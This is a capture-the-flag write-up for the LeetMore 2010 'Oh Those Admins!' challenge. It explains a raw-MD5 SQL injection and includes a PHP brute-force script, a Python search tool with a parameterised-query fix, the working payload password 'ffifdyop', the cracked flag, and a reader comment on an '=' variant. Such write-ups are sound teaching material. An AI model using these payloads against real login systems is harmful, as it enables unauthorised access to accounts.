Category: web-vuln?!
http://vos.uz/oh_those_admins/
http://vos.uz/oh_those_admins/index.php.txt
The PHP script takes a 'password' as input, computes its raw (binary) MD5, and runs the SQL query:
SELECT login FROM admins WHERE password = '$raw_md5'
If the query returns anything, the script hands us the full list of admins.
A raw MD5 can contain any byte value, and the script puts the 16 bytes into the query as-is, so this is an SQL injection. What we have to do is brute-force a password whose raw MD5 contains 'or'1, so that the query becomes
SELECT login FROM admins WHERE password = '<trash>'or'1<trash>'
This returns every row: MySQL converts the string '1<trash>' to a number using its leading digits, which gives 1, and a non-zero number is true, so the OR is true for each row. One caveat: the trash bytes must not themselves contain a single quote or a backslash, or the literal is tokenised differently and the injected expression breaks.
Math tells us roughly how often this happens: a 5-byte pattern can start at any of 12 offsets in a 16-byte hash, so about one hash in 256^5 / 12 ≈ 9.2 × 10^10 is usable. At 5M hashes per second that is about five hours, which is not very optimistic. To speed up the brute force we can accept every case of 'or' ('or', 'oR', 'Or', 'OR') plus its synonym '||', and any of the digits 1..9 instead of just '1' (0 is out, because '0<trash>' converts to 0, i.e. false). That is 5 × 9 = 45 accepted patterns, 45 times faster, so a usable hash should turn up about every 7 minutes.
I used a modified version of John the Ripper for the brute force, but even a PHP script will find one in reasonable time:
<?php
// Brute-force decimal passwords and print any whose raw MD5 contains 'or'
// (any case) or '||', followed by a non-zero digit: the shape the injection needs.
for ($i = 0; ; ) {
    for ($c = 0; $c < 1000000; $c++, $i++) {
        $raw = md5($i, true);
        if (preg_match('/\'(or|\|\|)\'[1-9]/i', $raw)) {
            echo "\nmd5($i) = " . bin2hex($raw) . "\n";
        }
    }
    echo ".";   // progress marker, once per million candidates
}
?>
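As an added example (mine, not code from the write-up or the CTF), here is the same candidate check and brute force in Python, with a parameterised query as the hardened counterpart of the vulnerable construction. It also accepts the shorter '=' pattern described in the comment below. The function names, the 12-offset estimate, and the rule that bytes outside the pattern must not contain a quote or backslash are my assumptions, stated in the comments.

```python
"""Added example, not code from the original write-up or the CTF.

Checks whether a raw (binary) MD5 breaks out of
    SELECT login FROM admins WHERE password = '<raw md5>'
and brute-forces decimal candidates the way the write-up's PHP loop does.
Function names and the acceptance rules below are my own assumptions.
"""
import hashlib
import re
from typing import Iterator, Optional, Tuple

# The write-up's pattern: 'or'<1-9> in any case, or its synonym '||'<1-9>.
# A string starting with a non-zero digit converts to a non-zero number,
# so  OR '6<anything>'  is true for every row.
_OR_PATTERN = re.compile(rb"'(?:or|\|\|)'[1-9]", re.IGNORECASE)

# The 3-byte variant from the comment:  password='<a>'='<b>'  is parsed as
# (password='<a>')='<b>'; the inner comparison is 0 for a wrong password and
# 0='<b>' is true when '<b>' converts to 0. Accept only a trailing part that is
# empty or starts with an ASCII letter, which always converts to 0 (assumption:
# deliberately conservative, other trailing bytes can work too).
_EQ_PATTERN = re.compile(rb"'='(?=[A-Za-z]|\Z)")


def raw_md5(password: bytes) -> bytes:
    return hashlib.md5(password).digest()


def usable(raw: bytes) -> Optional[Tuple[int, str]]:
    """Return (offset, kind) for a usable break-out in raw, or None.

    Beyond containing a pattern, the bytes outside it must hold no single
    quote and no backslash: either changes how MySQL tokenises the literal
    (a caveat the rough hash count ignores). Conservative by design: it
    rejects some hashes a real MySQL would still accept.
    """
    for kind, pattern in (("or", _OR_PATTERN), ("eq", _EQ_PATTERN)):
        m = pattern.search(raw)
        if m is None:
            continue
        outside = raw[:m.start()] + raw[m.end():]
        if b"'" in outside or b"\\" in outside:
            continue
        return m.start(), kind
    return None


def injected_query(raw: bytes) -> str:
    """The vulnerable construction, for display: raw bytes pasted into SQL text.
    latin-1 maps each byte to one character, which is how MySQL sees it."""
    return "SELECT login FROM admins WHERE password = '" + raw.decode("latin-1") + "'"


def safe_query(password: bytes) -> Tuple[str, Tuple[bytes]]:
    """Hardened form: a parameterised query (DB-API %s placeholder as used by
    MySQLdb/PyMySQL); the digest is bound as a value and never enters SQL text.
    MD5 is separately the wrong choice for storing passwords; this fixes only
    the injection."""
    return "SELECT login FROM admins WHERE password = %s", (raw_md5(password),)


def search(start: int, count: int) -> Iterator[Tuple[bytes, str, Tuple[int, str]]]:
    """Brute-force decimal passwords start..start+count-1, like the PHP loop."""
    for i in range(start, start + count):
        pw = str(i).encode()
        raw = raw_md5(pw)
        hit = usable(raw)
        if hit is not None:
            yield pw, raw.hex(), hit


def expected_hashes_per_hit(patterns: int) -> float:
    """Rough rate (assumption): a 5-byte pattern fits at 12 offsets of a 16-byte
    hash and `patterns` distinct 5-byte patterns are accepted (45 in the write-up)."""
    return 256 ** 5 / (12 * patterns)


if __name__ == "__main__":
    known = raw_md5(b"ffifdyop")          # the password the write-up found
    print(known.hex(), usable(known))
    print(injected_query(known))
    print("about one usable hash per", int(expected_hashes_per_hit(45)), "candidates")
    for pw, hexdigest, where in search(0, 1_000_000):
        print("hit:", pw.decode(), hexdigest, where)
```

Running it shows ffifdyop's digest starting with the bytes 27 6f 72 27 36, i.e. 'or'6 at offset 0, and the query text it produces; the decimal search over the first million candidates is the same loop as the PHP script and will usually print nothing, as the rate estimate predicts.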
I found a password, ffifdyop, whose MD5 is 276f722736c95d99e921722cf9ed621c: the first five bytes 27 6f 72 27 36 are 'or'6, and the rest is trash.
After logging in, we see the real admin's password hash (16 raw bytes, shown here in hex): 00071cc0720abd73f61a291224f248d6.
Googling it, or brute-forcing again, gives the answer: 13376843.
More write-ups on "Oh Those Admins!":
- LEET MORE CTF 2010 write up – Oh Those Admins! [eng] by UNTITLED
- LEET MORE CTF 2010 writeup (oh those admins) [rus] by InVaR (google-translated to [eng])
- SQL injection with raw MD5 hashes (Leet More CTF 2010 injection 300) [eng] by Kernel Sanders
- leetMore « Oh those Admins! » writeup [fr] by Nibbles (google-translated to [eng])
Hey.
Actually, using a hash that contains '=' will do the job.
The query becomes:
SELECT login FROM admins WHERE password='...'='...'
which works.
Explanation of why 'a'='b'='c' -> 1:
'a'='b'='c' is evaluated in this order: ('a'='b')='c'.
As 'a' != 'b', 'a'='b' gives us 0, which leads us to the final comparison 0='c'. Then MySQL tries to cast 'c' as a number and finds 0.
The comparison is now 0=0, which finally gives us 1.
Thanks for that sweet CTF LeetMore :) see you next year.
[…] Indeed, I had already done a challenge of this kind at the Leetmore CTF (Oh Those Admins). […]
[…] The exploit used here is […]